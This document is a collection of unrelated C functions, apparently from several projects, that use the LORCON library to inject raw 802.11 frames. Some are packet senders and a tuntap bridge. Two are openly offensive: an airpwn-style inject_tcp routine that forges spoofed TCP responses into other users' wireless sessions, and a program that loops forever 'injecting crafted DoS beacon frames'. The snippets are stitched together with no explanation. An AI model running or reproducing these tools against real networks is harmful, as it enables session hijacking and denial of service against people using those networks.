void send_beacon(__le16 seq) { int ret; packet->seq = seq; ret = tx80211_txpacket(&tx, &tx_packet); if (ret < 0) { fprintf(stderr, "Unable to transmit packet: %s\n", tx.errstr); exit(1); } }
static VALUE lorcon_device_write(int argc, VALUE *argv, VALUE self) { struct rldev *rld; int ret = 0; int cnt = 0; int dly = 0; VALUE rbbuff, rbcnt, rbdelay; Data_Get_Struct(self, struct rldev, rld); switch(rb_scan_args(argc, argv, "12", &rbbuff, &rbcnt, &rbdelay)) { case 1: rbdelay = INT2NUM(0); case 2: rbcnt = INT2NUM(1); default: break; } cnt = NUM2INT(rbcnt); dly = NUM2INT(rbdelay); rld->in_packet.packet = StringValuePtr(rbbuff); rld->in_packet.plen = RSTRING(rbbuff)->len; for (; cnt > 0; cnt--) { ret = tx80211_txpacket(&rld->in_tx, &rld->in_packet); if (ret < 0) { rb_raise(rb_eRuntimeError, "Lorcon could not transmit packet: %s", tx80211_geterrstr(&rld->in_tx)); return(INT2NUM(ret)); } if (dly > 0) #ifdef _MSC_VER Sleep(dly); #else usleep(dly); #endif } return (rbcnt); }
int main(int argc, char *argv[]) { struct tx80211 in_tx; struct tx80211_packet in_packet; struct ifreq ifr; int ret = 0, channel = 0, c = 0, ttfd = -1, intfd = -1, flags = 0; int drivertype = INJ_NODRIVER; char iface[16 + 1]; char tface[16 + 1]; char errstr[PCAP_ERRBUF_SIZE + 1]; pcap_t *pd; const u_char *pcap_pkt; struct pcap_pkthdr pcap_hdr; memset(iface, 0, sizeof(iface)); memset(tface, 0, sizeof(tface)); while ((c = getopt(argc, argv, "i:t:d:c:")) != EOF) { switch (c) { case 'i': strncpy(iface, optarg, sizeof(iface) - 1); break; case 't': strncpy(tface, optarg, sizeof(tface) - 1); break; case 'd': drivertype = tx80211_resolvecard(optarg); break; case 'c': if (sscanf(optarg, "%d", &channel) != 1) { fprintf(stderr, "%s: Illegal channel on cmd line", argv[0]); usage(); return -1; } break; default: break; } } if (!strlen(iface)) { fprintf(stderr, "Must specify an interface name.\n"); usage(); return -1; } if (!strlen(tface)) { fprintf(stderr, "Must specify a tuntap interface name.\n"); usage(); return -1; } if (drivertype == INJ_NODRIVER) { fprintf(stderr, "Driver name not recognized.\n"); usage(); return -1; } if (tx80211_init(&in_tx, iface, drivertype) < 0) { perror("tx80211_init"); return -1; } /* Create the tuntap device */ if ((ttfd = open("/dev/net/tun", O_RDWR)) < 0) { perror("Could not open /dev/net/tun control file"); return -1; } memset(&ifr, 0, sizeof(ifr)); ifr.ifr_flags = (IFF_TAP | IFF_NO_PI); strncpy(ifr.ifr_name, tface, sizeof(tface) - 1); if (ioctl(ttfd, TUNSETIFF, (void *) &ifr) < 0) { perror("Unable to create tuntap interface"); return -1; } /* bring the tuntap up */ if ((intfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("Failed to create AF_INET socket"); return -1; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, tface, IFNAMSIZ); if (ioctl(intfd, SIOCGIFFLAGS, &ifr) < 0) { perror("Failed to get interface flags for tuntap"); return -1; } flags = ifr.ifr_flags; flags |= (IFF_UP | IFF_RUNNING | IFF_PROMISC); ifr.ifr_flags = flags; if (ioctl(intfd, SIOCSIFFLAGS, &ifr) < 0) { perror("Failed to set interface flags for tuntap"); return -1; } close(intfd); /* Set monitor mode */ ret = tx80211_setmode(&in_tx, IW_MODE_MONITOR); if (ret != 0) { fprintf(stderr, "Error setting mode, returned %d.\n", ret); return 1; } /* Switch to the given channel */ ret = tx80211_setchannel(&in_tx, channel); if (ret < 0) { fprintf(stderr, "Error setting channel, returned %d.\n", ret); return 1; } /* Open the interface to get a socket */ ret = tx80211_open(&in_tx); if (ret < 0) { fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname); return 1; } /* Open the pcap interface */ pd = pcap_open_live(tface, MAX_PACKET_LEN, 1, 1000, errstr); if (pd == NULL) { perror("Failed to open tuntap with pcap"); fprintf(stderr, "%s\n", errstr); return 1; } fprintf(stderr, "Linked %s to %s, waiting for packets...\n", tface, iface); while (1) { if ((pcap_pkt = pcap_next(pd, &pcap_hdr)) == NULL) { pcap_perror(pd, "Failed to get next packet from tuntap"); break; } in_packet.packet = (u_char *) pcap_pkt; in_packet.plen = pcap_hdr.caplen; ret = tx80211_txpacket(&in_tx, &in_packet); if (ret < 0) { fprintf(stderr, "Unable to transmit packet, returned %d.\n", ret); perror("tx80211_txpacket"); break; } } tx80211_close(&in_tx); return 0; }
int main(int argc, char** argv) { uint32_t send_sec; uint32_t packet_size; struct lorcon_packet *packet; uint32_t i; int32_t ret; uint32_t mode; uint32_t delay_us; struct timespec start, now; int32_t diff; /* Parse arguments */ if (argc > 5) { printf("Usage: random_packets <number> <length> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n"); return 1; } if (argc < 5 || (1 != sscanf(argv[4], "%u", &delay_us))) { delay_us = 0; } if (argc < 4 || (1 != sscanf(argv[3], "%u", &mode))) { mode = 0; printf("Usage: random_packets <number> <length> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n"); } else if (mode > 1) { printf("Usage: random_packets <number> <length> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n"); return 1; } if (argc < 3 || (1 != sscanf(argv[2], "%u", &packet_size))) packet_size = 2200; if (argc < 2 || (1 != sscanf(argv[1], "%u", &send_sec))) send_sec = 10000; /* Generate packet payloads */ //printf("Generating packet payloads \n"); payload_buffer = malloc(PAYLOAD_SIZE); if (payload_buffer == NULL) { perror("malloc payload buffer"); exit(1); } generate_payloads(payload_buffer, PAYLOAD_SIZE); /* Setup the interface for lorcon */ //printf("Initializing LORCON\n"); init_lorcon(); /* Allocate packet */ packet = malloc(sizeof(*packet) + packet_size); if (!packet) { perror("malloc packet"); exit(1); } packet->fc = (0x08 /* Data frame */ | (0x0 << 8) /* Not To-DS */); packet->dur = 0xffff; if (mode == 0) { memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6); get_mac_address(packet->addr2, "mon1"); memcpy(packet->addr3, "\x00\x16\xea\x12\x34\x56", 6); } else if (mode == 1) { memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6); memcpy(packet->addr2, "\x00\x16\xea\x12\x34\x56", 6); memcpy(packet->addr3, "\xff\xff\xff\xff\xff\xff", 6); } packet->seq = 0; tx_packet.packet = (uint8_t *)packet; tx_packet.plen = sizeof(*packet) + packet_size; /* Send packets */ //printf("Sending packets of size %u for %d sec...\n", packet_size, send_sec); if (delay_us) { /* Get start time */ clock_gettime(CLOCK_MONOTONIC, &start); } i = 0; int cur_sec = 0; double cur_pkt_msec = 0; clock_gettime(CLOCK_MONOTONIC, &start); clock_gettime(CLOCK_MONOTONIC, &now); //for (i = 0; i < send_sec; ++i) { while(cur_sec < send_sec) { payload_memcpy(packet->payload, packet_size, (i*packet_size) % PAYLOAD_SIZE); clock_gettime(CLOCK_MONOTONIC, &now); int sub_time = (int)(now.tv_nsec * 1e-9 + now.tv_sec - start.tv_nsec * 1e-9 - start.tv_sec); if (sub_time > cur_sec) { cur_sec = sub_time; //printf("time: %d\n", (now.tv_nsec - start.tv_nsec) * 1e-9); printf("time now: %d\n", cur_sec); } /* double sub_pkt_msec = (now.tv_nsec - start.tv_nsec) / 1e6 + (now.tv_sec - start.tv_sec) * 1e3; if (sub_pkt_msec > cur_pkt_msec + 0.25) { cur_pkt_msec = sub_pkt_msec; } else { continue; } */ if (delay_us) { clock_gettime(CLOCK_MONOTONIC, &now); diff = (now.tv_sec - start.tv_sec) * 1000000 + (now.tv_nsec - start.tv_nsec + 500) / 1000; diff = delay_us*i - diff; if (diff > 0 && diff < delay_us) usleep(diff); } ret = tx80211_txpacket(&tx, &tx_packet); if (ret < 0) { fprintf(stderr, "Unable to transmit packet: %s\n", tx.errstr); exit(1); } i++; if (((i+1) % 1000) == 0) { //printf("."); fflush(stdout); } if (((i+1) % 50000) == 0) { //printf("%dk\n", (i+1)/1000); fflush(stdout); } } printf("total packet sent: %d\n", i); return 0; }
/** * Function to inject TCP packets to the wireless interface. Requires headers * from a TO_DS packet for use in crafting the FROM_DS response. */ void inject_tcp(airpwn_ctx *ctx, ieee80211_hdr *w_hdr, struct iphdr *ip_hdr, struct tcphdr *tcp_hdr, uint8_t *wepkey, uint32_t keylen, char *content, uint32_t contentlen, uint8_t tcpflags, uint32_t *seqnum) { // libnet wants the data in host-byte-order u_int ack = ntohl(tcp_hdr->seq) + ( ntohs(ip_hdr->tot_len) - ip_hdr->ihl * 4 - tcp_hdr->doff * 4 ); ctx->tcp_t = libnet_build_tcp( ntohs(tcp_hdr->dest), // source port ntohs(tcp_hdr->source), // dest port *seqnum, // sequence number ack, // ack number tcpflags, // flags 0xffff, // window size 0, // checksum 0, // urg ptr 20 + contentlen, // total length of the TCP packet (uint8_t*)content, // response contentlen, // response_length ctx->lnet, // libnet_t pointer ctx->tcp_t // ptag ); if(ctx->tcp_t == -1){ printf("libnet_build_tcp returns error: %s\n", libnet_geterror(ctx->lnet)); return; } ctx->ip_t = libnet_build_ipv4( 40 + contentlen, // length 0, // TOS bits 1, // IPID (need to calculate) 0, // fragmentation 0xff, // TTL 6, // protocol 0, // checksum ip_hdr->daddr, // source address ip_hdr->saddr, // dest address NULL, // response 0, // response length ctx->lnet, // libnet_t pointer ctx->ip_t // ptag ); if(ctx->ip_t == -1){ printf("libnet_build_ipv4 returns error: %s\n", libnet_geterror(ctx->lnet)); return; } // copy the libnet packets to to a buffer to send raw.. unsigned char packet_buff[0x10000]; memcpy(packet_buff, w_hdr, IEEE80211_HDR_LEN); ieee80211_hdr *n_w_hdr = (ieee80211_hdr *)packet_buff; // set the FROM_DS flag and swap MAC addresses n_w_hdr->flags = IEEE80211_FROM_DS; if(wepkey) n_w_hdr->flags |= IEEE80211_WEP_FLAG; n_w_hdr->llc.type = LLC_TYPE_IP; uint8_t tmp_addr[6]; memcpy(tmp_addr, n_w_hdr->addr1, 6); memcpy(n_w_hdr->addr1, n_w_hdr->addr2, 6); memcpy(n_w_hdr->addr2, tmp_addr, 6); u_int32_t packet_len; u_int8_t *lnet_packet_buf; // cull_packet will dump the packet (with correct checksums) into a // buffer for us to send via the raw socket if(libnet_adv_cull_packet(ctx->lnet, &lnet_packet_buf, &packet_len) == -1){ printf("libnet_adv_cull_packet returns error: %s\n", libnet_geterror(ctx->lnet)); return; } memcpy(packet_buff + IEEE80211_HDR_LEN, lnet_packet_buf, packet_len); libnet_adv_free_packet(ctx->lnet, lnet_packet_buf); // total packet length int len = IEEE80211_HDR_LEN + 40 + contentlen; if(wepkey){ uint8_t tmpbuf[0x10000]; /* encryption starts after the 802.11 header, but the LLC header * gets encrypted. */ memcpy(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC, len-IEEE80211_HDR_LEN_NO_LLC); len = wep_encrypt(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC, len-IEEE80211_HDR_LEN_NO_LLC, wepkey, keylen); if(len <= 0){ fprintf(stderr, "Error performing WEP encryption!\n"); return; } else len += IEEE80211_HDR_LEN_NO_LLC; } /* Establish lorcon packet transmission structure */ ctx->in_packet.packet = packet_buff; ctx->in_packet.plen = len; /* Send the packet */ if (tx80211_txpacket(&ctx->inject_tx, &ctx->in_packet) < 0) { fprintf(stderr, "Unable to transmit packet."); perror("tx80211_txpacket"); return; } *seqnum += contentlen; //advance the sequence number printlog(ctx, 2, "wrote %d bytes to the wire(less)\n", len); }
int main(int argc, char** argv) { uint8_t *payload_buffer; uint32_t num_packets = 0; uint32_t packet_size = 0; uint32_t payload_size = 0; char *file_path; struct lorcon_packet *packet; uint32_t i; int32_t ret; uint32_t mode; uint32_t delay_us; struct timespec start, now; int32_t diff; /* Parse arguments */ if (argc > 4) { printf("Usage: random_packets <file_name> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n"); return 1; } if (argc < 4 || (1 != sscanf(argv[3], "%u", &delay_us))) { delay_us = 0; } if (argc < 3 || (1 != sscanf(argv[2], "%u", &mode))) { mode = 0; } else if (mode > 1) { printf("Usage: random_packets <file_name> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n"); return 1; } if (argc < 2 || strlen(argv[1]) == 0) { printf("Usage: random_packets <file_name> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n"); return 1; } else { file_path = argv[1]; } /* Generate packet payloads */ printf("Generating packet payload from file: %s \n", file_path); generate_payload_from_file(file_path, &payload_buffer, &payload_size); printf("Read payload, size is: %d\n", payload_size); // Set packet size and number of packets if (payload_size > MAX_PACKET_SIZE) { packet_size = MAX_PACKET_SIZE; num_packets = ceil((float) payload_size / (float) MAX_PACKET_SIZE); } else { packet_size = payload_size; num_packets = 1; } /* Setup the interface for lorcon */ printf("Initializing LORCON\n"); init_lorcon(); /* Allocate packet */ packet = malloc(sizeof(*packet) + packet_size); if (!packet) { perror("malloc packet"); exit(1); } packet->fc = (0x08 /* Data frame */ | (0x0 << 8) /* Not To-DS */); packet->dur = 0xffff; if (mode == 0) { memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6); get_mac_address(packet->addr2, "mon0"); memcpy(packet->addr3, "\x00\x16\xea\x12\x34\x56", 6); } else if (mode == 1) { memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6); memcpy(packet->addr2, "\x00\x16\xea\x12\x34\x56", 6); memcpy(packet->addr3, "\xff\xff\xff\xff\xff\xff", 6); } packet->seq = 0; tx_packet.packet = (uint8_t *)packet; tx_packet.plen = sizeof(*packet) + packet_size; /* Send packets */ printf("Sending %u packets of size %u (. every thousand)\n", num_packets, packet_size); if (delay_us) { /* Get start time */ clock_gettime(CLOCK_MONOTONIC, &start); } for (i = 0; i < num_packets; ++i) { if (i == (num_packets - 1)) { printf("final packet size: %d\n", (payload_size - i * packet_size)); memcpy(packet->payload, (payload_buffer + (i * packet_size)), (payload_size - i * packet_size)); tx_packet.plen = sizeof(*packet) + (payload_size - i * packet_size); } else { memcpy(packet->payload, (payload_buffer + (i * packet_size)), packet_size); } if (delay_us) { clock_gettime(CLOCK_MONOTONIC, &now); diff = (now.tv_sec - start.tv_sec) * 1000000 + (now.tv_nsec - start.tv_nsec + 500) / 1000; diff = delay_us*i - diff; if (diff > 0 && diff < delay_us) usleep(diff); } ret = tx80211_txpacket(&tx, &tx_packet); if (ret < 0) { fprintf(stderr, "Unable to transmit packet: %s\n", tx.errstr); exit(1); } if (((i+1) % 1000) == 0) { printf("."); fflush(stdout); } if (((i+1) % 50000) == 0) { printf("%dk\n", (i+1)/1000); fflush(stdout); } } return 0; }
int main(int argc, char **argv) { struct tx80211 tx; struct tx80211_packet pkt; char p1[BEACON_NOSSID_LEN]; char p2[BEACON_SSID_LEN]; int ret, drivertype; uint8_t randbyte; if (argc < 3) { usage(argv); return 0; } printf("[+] Initializing interface %s...\n", argv[1]); drivertype = tx80211_resolvecard(argv[2]); if (drivertype == INJ_NODRIVER) { printf("[-] Driver name not recognized.\n"); exit(1); } ret = tx80211_init(&tx, argv[1], drivertype); if (ret < 0) { printf("[-] Error initializing %s/%s", argv[1], argv[2]); exit(1); } ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON); if (ret != 0) { printf("[-] Error setting monitor mode.\n"); printf("[-] %s.\n", tx80211_geterrstr(&tx)); exit(1); } ret = tx80211_setchannel(&tx, 11); if (ret < 0) { printf("[-] Error setting channel.\n"); printf("[-] %s.\n", tx80211_geterrstr(&tx)); exit(1); } ret = tx80211_open(&tx); if (ret < 0) { printf("[-] Unable to open interface %s\n", tx.ifname); printf("[-] %s.\n", tx80211_geterrstr(&tx)); exit(1); } srand(time(NULL)); memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN); memcpy(p2, BEACON_SSID, BEACON_SSID_LEN); printf("[+] Injecting crafted DoS beacon frames...\n"); while (1) { randbyte = rand() & 0xff; p1[15] = randbyte; p1[21] = randbyte; p2[15] = randbyte; p2[21] = randbyte; pkt.packet = p1; pkt.plen = BEACON_NOSSID_LEN; if (tx80211_txpacket(&tx, &pkt) < 0) { printf("[-] Unable to transmit packet.\n"); printf("[-] %s.\n", tx80211_geterrstr(&tx)); exit(1); } pkt.packet = p2; pkt.plen = BEACON_SSID_LEN; if (tx80211_txpacket(&tx, &pkt) < 0) { printf("[-] Unable to transmit packet.\n"); printf("[-] %s.\n", tx80211_geterrstr(&tx)); exit(1); } } tx80211_close(&tx); return 0; }